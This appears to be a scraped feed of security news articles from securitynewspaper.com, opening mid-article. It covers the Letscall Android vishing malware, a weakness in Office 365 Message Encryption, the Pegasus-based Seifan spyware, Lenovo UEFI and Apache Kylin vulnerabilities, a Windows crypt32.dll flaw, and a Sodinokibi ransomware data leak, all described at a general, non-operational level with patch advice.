  3. Frontend developers who are proficient in JavaScript programming and have experience processing VoIP communications.
  4. Backend developers who are experienced with the methods used to safeguard the backend API against unauthorized access.
  5. Call operators who are proficient in a variety of languages and have experience conducting voice-based social engineering attacks.

The attack is divided into three phases, which are as follows:

Phishing takes place when a victim accesses a website that has been designed to look like the Google Play Store. From that URL the victim downloads the first malicious program in the chain.

This first stage, which we will refer to as the downloader, accesses the phishing web page, performs preparations on the device, obtains the appropriate permissions, and installs the second-stage malware, which is downloaded from the control server.

The second stage of the attack is a powerful spyware program that the attacker uses both to exfiltrate data and to enroll the infected device in a peer-to-peer voice over Internet Protocol (P2P VoIP) network that is used to connect with the victim through audio or video calls. This application also drops the third stage, the next link in the chain. Letscall makes use of WebRTC technologies to redirect the VoIP traffic and establish a connection between the victim and call-center operators. It employs STUN/TURN technologies, including Google STUN servers, to circumvent network address translation (NAT) and firewalls and obtain the highest possible quality for phone or video calls.

The third stage is a companion program that extends some of the functionalities of the second-stage malware. It has phone call capability, which is used to divert the call from the victim device to the contact center controlled by the attacker.

After investigating the “Letscall” malware operations, the researchers identified a cybercriminal organization that is well-versed in Android security as well as contemporary voice routing technology. They demonstrated that social engineering attacks that are technically sound but poorly executed may nevertheless pose a significant risk.

The care the group devotes to creating fake Google Play sites, stolen logos of existing Korean apps, and a novel approach employing nanoHTTPD to drop the payload is clear evidence that technical features are just as vital as social engineering.

Theft of resident registration numbers (or IDs) may open numerous doors for cybercriminals, and we anticipate this attack vector only increasing as more electronic ID solutions are adopted by governments, private businesses, and public organizations. It is not uncommon for Asian threat groups to make use of an evasive method that has already been used by other actors. It is probable that certain software engineers in one location work for more than one cybercrime organization, even if they are not physically located next to one another in the same office building.


]]>
Message Encryption (OME) used by Office 365 can easily be broken to read encrypted emails via MiTM https://www.securitynewspaper.com/2022/10/18/message-encryption-ome-used-by-office-365-can-easily-be-broken-to-read-encrypted-emails-via-mitm/ Tue, 18 Oct 2022 22:42:06 +0000 https://www.securitynewspaper.com/?p=25818

]]>
The message encryption system employed by Microsoft in Office 365 has a vulnerability, according to a warning from the Finnish cybersecurity company WithSecure. According to WithSecure’s alert, the Office 365 Message Encryption (OME) security technique is defective, which makes it possible to infer the contents of encrypted messages.

This technique is used to send and receive encrypted emails between internal and external users without revealing any information about their correspondence.

Due to the weakness, malicious third parties who gain access to encrypted emails may be able to decrypt them, revealing private user communications. The secrecy of the communications is compromised because ECB mode divulges their structural information.

During its analysis, WithSecure was able to decrypt an image’s AES-encrypted data. The underlying issue, according to the researchers, is the ECB mode of operation, not AES itself. When WithSecure alerted Microsoft, the company said the report did not meet the criteria for security servicing and does not qualify as a breach, according to information provided by WithSecure.

“Neither a breach nor a notification were deemed to fulfill the standards for security servicing. Since there was no code modification, there was no CVE for this report.”

Microsoft

WithSecure demonstrated that exploitation is possible and also cited NIST’s response, in which the organization acknowledged that ECB mode is in fact defective. Until Microsoft provides a remedy or a better alternative is available, users should exercise caution, and companies employing OME for email encryption should not rely on it as the exclusive source of email secrecy.


]]>
Seifan: See the version of Pegasus spyware software designed just for Police https://www.securitynewspaper.com/2022/08/05/seifan-see-the-version-of-pegasus-spyware-software-designed-just-for-police/ Fri, 05 Aug 2022 18:18:19 +0000 https://www.securitynewspaper.com/?p=25581

]]>
Details and screenshots of a version of the Pegasus spyware software designed for the Israeli police were leaked. The police referred to this spyware by a different name: Seifan.

The spyware’s capabilities ranged from listening to any phone call on a victim’s phone and reading text messages to remotely listening via the microphone and starting the camera without the victim’s knowledge. The spyware also allowed retrieval of location, contacts list, SMS, WhatsApp messages, emails, instant messaging, outgoing and incoming calls, calendar, remote recordings and remote camera use.

Earlier, the former Israeli police commissioner said that “The Police don’t have Pegasus”. In response, a court-led investigative committee tasked with checking whether the police had used the spyware to hack into people’s phones without permission found that the police had Seifan.

The court found that, even though there had been no eavesdropping without court orders, the spyware was deployed in 2016. The phone data collected exceeded what was legally allowed by the court orders, and the organization still holds the information in the databases of its cyber department.

According to the Israeli newspaper Haaretz, the leaked presentation highlighted screenshots of the spyware, which included covertly monitoring “protected messages” as well as voice and text chats on advanced cell phones. The police had complete control of the victim’s cell phone after infecting it.

The spyware and capabilities of the police-implemented system were ever presented to the cabinet ministers. Screenshots from the prototype of the system the police intended to use were included in the presentation and show the NSO logo and the product name Pegasus itself.

Another capability of Seifan is “volume listening”, which is considered much more intrusive. It means listening to calls in real time by remotely activating the phone’s microphone, rather than hacking into the cell phone’s SIM card. This type of wiretapping requires an order from a district court president or their deputy.


]]>
3 Critical Vulnerabilities In Lenovo Laptops’ UEFI (70 Models Including Thinkbook) Allow Them To Be Hacked Forever, Even After Removing The Hard Drive https://www.securitynewspaper.com/2022/07/13/3-critical-vulnerabilities-in-lenovo-laptops-uefi-70-models-including-thinkbook-allow-them-to-be-hacked-forever-even-after-removing-the-hard-drive/ Wed, 13 Jul 2022 16:59:10 +0000 https://www.securitynewspaper.com/?p=25501

]]>
Lenovo released security fixes to address three vulnerabilities that reside in the UEFI firmware shipped with over 70 product models, including several ThinkBook models. ESET Research discovered these three vulnerabilities and reported them to the manufacturer. Two months ago, UEFI vulnerabilities affected Dell laptops.

CVE-2022-1890: A buffer overflow has been identified in the ReadyBootDxe driver in some Lenovo notebook products which may allow an attacker with local privileges to execute arbitrary code. 

CVE-2022-1891: A buffer overflow has been identified in the SystemLoadDefaultDxe driver in some Lenovo notebook products which may allow an attacker with local privileges to execute arbitrary code. 

CVE-2022-1892: A buffer overflow has been identified in the SystemBootManagerDxe driver in some Lenovo notebook products which may allow an attacker with local privileges to execute arbitrary code.

Potential Impact: Privilege escalation 

Severity: Medium

Mitigation

Owners of affected devices are strongly advised to update to the latest firmware version. To download the version specified for your product below, navigate to the Drivers & Software support site for your product and follow these steps:

  1. Search for your product by name or machine type.
  2. Click Drivers & Software on the left menu panel.
  3. Click on Manual Update to browse by Component type.
  4. Compare the minimum fix version for your product from the applicable product table below with the latest version posted on the support site.

List of Models affected


]]>
[CVE-2020-1956] Apache Kylin command injection vulnerability https://www.securitynewspaper.com/2020/06/01/cve-2020-1956-apache-kylin-command-injection-vulnerability/ Mon, 01 Jun 2020 18:58:14 +0000 https://www.securitynewspaper.com/?p=20021

]]>
A team of cyber security awareness specialists recently revealed the finding of a critical vulnerability in Apache Kylin, the open source distributed analytics engine designed to provide a SQL interface and multidimensional analytics on Hadoop and Alluxio for extremely large datasets.

According to the report, the security flaw, tracked as CVE-2020-1956, would allow remote code execution on vulnerable systems.

Kylin has some RESTful APIs that concatenate operating system commands with strings entered by the user. Because the user input is not properly validated, threat actors could execute arbitrary system commands without any verification.

Cyber security awareness experts also mentioned that a proof of concept for the vulnerability was published, and users of affected deployments were asked to take the necessary steps to protect their systems. According to the report, the affected versions are:

  • Kylin 2.3.0 – 2.3.2
  • Kylin 2.4.0 – 2.4.1
  • Kylin 2.5.0 – 2.5.2
  • Kylin 2.6.0 – 2.6.5
  • Kylin 3.0.0-alpha
  • Kylin 3.0.0-alpha2
  • Kylin 3.0.0-beta
  • Kylin 3.0.0 – 3.0.1

Kylin versions 2.6.6 and 3.0.2 are not affected by the vulnerability.

Apache Kylin developers fixed the flaw in the latest software releases (2.6.6 and 3.0.2). Users are strongly encouraged to upgrade to the fixed versions as soon as possible to mitigate the risk of exploitation.

If users are unable to install the updates, they can set kylin.tool.auto-migrate-cube.enabled to false, which disables the execution of remote commands, cyber security awareness experts mention.

For further reports on vulnerabilities, exploits, malware variants and computer security risks you can access the website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.


]]>
Microsoft will fix most dangerous vulnerability in Windows https://www.securitynewspaper.com/2020/01/14/microsoft-will-fix-most-dangerous-vulnerability-in-windows/ Tue, 14 Jan 2020 10:34:50 +0000 https://www.securitynewspaper.com/?p=18285

]]>
This vulnerability affects all versions of Windows from the past two decades.

Microsoft will release a patch on 14 Jan 2020 for this extremely dangerous vulnerability in a Windows module called crypt32.dll. This crypt32.dll is responsible for certificates and for the exchange of encrypted messages in the Windows Crypto API. This API helps developers encrypt and decrypt data using digital certificates. The flaw could be abused by malware writers, including ransomware writers, to spoof digital certificates so that the malware appears to be a benign program.

CRYPT32.dll has the most dangerous vulnerability in Windows

According to the KrebsOnSecurity portal, Microsoft has already shared the patch with defense organizations and operators of nationwide critical infrastructure. According to the International Institute of Cyber Security, this vulnerability poses a serious threat to the following important Windows functions:

  • Windows Authentication on desktop and servers
  • Confidential data retained by Microsoft Internet Explorer and Edge browsers
  • and third-party applications.

This vulnerability has been present in Windows for decades, since Windows NT. Microsoft will release a patch on Tuesday and possibly some more information regarding the vulnerability.


]]>
Ransomware stolen data is made public by hackers, for the First Time https://www.securitynewspaper.com/2020/01/13/ransomware-stolen-data-is-made-public-by-hackers-for-the-first-time/ Mon, 13 Jan 2020 10:21:47 +0000 https://www.securitynewspaper.com/?p=18266

]]>
For the first time in history, data stolen by the Sodinokibi ransomware was made public by the hackers because the victim did not pay the ransom. Sodinokibi ransomware was first found on April 17, 2019. It is used by the GOLD SOUTHFIELD threat group, a financially motivated group whose prime motive is to distribute ransomware through exploit kits, backdoored software, RDP servers and other exploitation techniques. For the first time, the Sodinokibi makers released a victim’s files because the ransom was not paid on time.

One of the Sodinokibi representatives, known as REvil, publicly declared that they would follow Maze ransomware and publish all stolen files of victims who did not pay the ransom. Making good on that promise, the Sodinokibi representative posted around 337 MB of stolen data on a Russian forum.

The Sodinokibi representative says the data belongs to Artech Information Systems, which describes itself as a “Minority & Women Owned Diversity Supplier” and one of the largest staffing companies in the US. According to ethical hacking researchers of the International Institute of Cyber Security, the Artech website is down. The hackers have posted only a small amount of data and said that if they do not get paid, they will keep releasing data to third parties, including financial details.

When security researchers tried to reach Artech with questions about the ransomware attack, the company did not respond. In recent years we have seen many ransomware attacks, which need to be treated as seriously as a major data breach.

Thanks to Michael Gillespie and his team for their work on ransomware such as Sodinokibi and for helping protect the world from ransomware attacks.


]]>